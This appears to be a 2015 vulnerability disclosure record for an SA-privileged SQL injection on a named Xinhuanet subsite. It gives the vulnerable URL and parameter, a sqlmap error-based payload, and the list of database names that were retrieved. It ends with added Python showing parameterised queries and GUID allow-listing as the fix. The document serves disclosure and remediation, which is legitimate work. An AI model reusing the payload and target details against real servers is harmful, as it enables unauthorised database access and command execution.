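2015-03-18: Details reported to the vendor; awaiting vendor handling
2015-03-23: Vendor confirmed; details disclosed to the vendor only
2015-04-02: Details disclosed to core white hats and relevant domain experts
2015-04-12: Details disclosed to regular white hats
2015-04-22: Details disclosed to trainee white hats
2015-05-07: Details disclosed to the public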
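SQL injection with SA privileges on a Xinhuanet subsite. The web server and the database are on separate hosts; SA privileges; system commands can be executed.
URL: http://mis.xinhuanet.com/sxtv2/index/inc/info/info.asp?tid={9E563755-C612-4ECF-A390-B9574DBFB604}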
GET parameter 'tid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
---
Place: GET
Parameter: tid
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: tid={9E563755-C612-4ECF-A390-B9574DBFB604}' AND 7651=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(103)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (7651=7651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(99)+CHAR(100)+CHAR(100)+CHAR(113))) AND 'yMsb'='yMsb
---
[04:35:01] [INFO] testing Microsoft SQL Server
[04:35:02] [INFO] confirming Microsoft SQL Server
[04:35:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
Database list:
[04:43:22] [INFO] the SQL query used returns 12 entries
[04:43:25] [INFO] retrieved: fininfo
[04:43:25] [INFO] retrieved: macro_data
[04:43:29] [INFO] retrieved: master
[04:43:33] [INFO] retrieved: model
[04:43:33] [INFO] retrieved: msdb
[04:43:33] [INFO] retrieved: oa
[04:43:34] [INFO] retrieved: Port_XH
[04:43:34] [INFO] retrieved: ReportServer
[04:43:34] [INFO] retrieved: ReportServerTempDB
[04:43:35] [INFO] retrieved: shuju
[04:43:35] [INFO] retrieved: tempdb
[04:43:36] [INFO] retrieved: xhs
available databases [12]:
[*] fininfo
[*] macro_data
[*] master
[*] model
[*] msdb
[*] oa
[*] Port_XH
[*] ReportServer
[*] ReportServerTempDB
[*] shuju
[*] tempdb
[*] xhs
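Command execution:
Filtering.
Severity: High
Vulnerability Rank: 11
Confirmed: 2015-03-23 09:31
CNVD has confirmed the situation described and has forwarded it to CNCERT to notify the relevant departments.
None yet.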
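The only remediation the report gives is filtering. As an added example (not code from the report or from the affected site), the Python below contrasts a lookup that concatenates `tid` into the SQL text with one that allow-lists the braced-GUID shape and binds the value as a parameter. Assumptions: sqlite3 stands in for SQL Server, the `info` table and all function names are hypothetical, and the payload is a shortened form of the one in the sqlmap output.

```python
import re
import sqlite3

# A legitimate tid on this page is a braced GUID and nothing else.
GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")

GOOD_TID = "{9E563755-C612-4ECF-A390-B9574DBFB604}"
# Shortened from the payload in the sqlmap output above (inner SELECT trimmed).
PAYLOAD_TID = GOOD_TID + "' AND 7651=CONVERT(INT,(SELECT CHAR(113))) AND 'yMsb'='yMsb"


def make_db():
    """Constructed stand-in table; the real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE info (tid TEXT PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO info VALUES (?, ?)", (GOOD_TID, "constructed row"))
    return db


def lookup_concat(db, tid):
    """'Before' form: the request value is spliced into the SQL text."""
    return db.execute("SELECT title FROM info WHERE tid = '" + tid + "'").fetchone()


def lookup_bound(db, tid):
    """Bound parameter: the value is compared as data, never parsed as SQL."""
    return db.execute("SELECT title FROM info WHERE tid = ?", (tid,)).fetchone()


def lookup_safe(db, tid):
    """Hardened form: allow-list the GUID shape first, then bind."""
    if not GUID_RE.fullmatch(tid):
        raise ValueError("tid is not a braced GUID")
    return lookup_bound(db, tid)


def outcome(lookup, tid):
    """Return the fetched row, or the name of the exception the lookup raised."""
    try:
        return lookup(make_db(), tid)
    except (sqlite3.OperationalError, ValueError) as exc:
        return type(exc).__name__


if __name__ == "__main__":
    for fn in (lookup_concat, lookup_bound, lookup_safe):
        for label, tid in (("good", GOOD_TID), ("payload", PAYLOAD_TID)):
            print(f"{fn.__name__:14} {label:8} -> {outcome(fn, tid)!r}")
```

In the concatenated form the database engine parses the injected text as SQL (here it fails on the unknown `CONVERT` function, which is the same parsing step the error-based technique relies on), while the bound form simply finds no matching row. Connecting with a low-privilege login instead of SA limits what any remaining injection can reach.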